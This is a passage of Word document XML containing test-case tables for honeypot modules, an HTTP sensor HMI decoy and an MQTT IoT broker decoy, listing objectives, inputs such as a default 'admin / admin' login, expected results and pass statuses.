                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">401 unauthorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401 {"error":"unauthorized"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SEN-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (Sensor HMI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify Basic authentication with a default credential</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running; port 8082 open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET / with Authorization: Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">admin / admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HMI page with live readings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200; readings, thresholds and history shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-SEN-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (Sensor HMI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify access without credentials is challenged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET / without credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">401 with WWW-Authenticate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401 with Basic challenge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9040" w:name="_Toc69040"/>
      <w:r>
        <w:t xml:space="preserve">MQTT Honeypot (IoT Broker)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9040"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests the MQTT broker honeypot on port 1883: CONNECT handling, subscriptions and control topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for the MQTT Broker</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-MQTT-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT Honeypot (Broker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
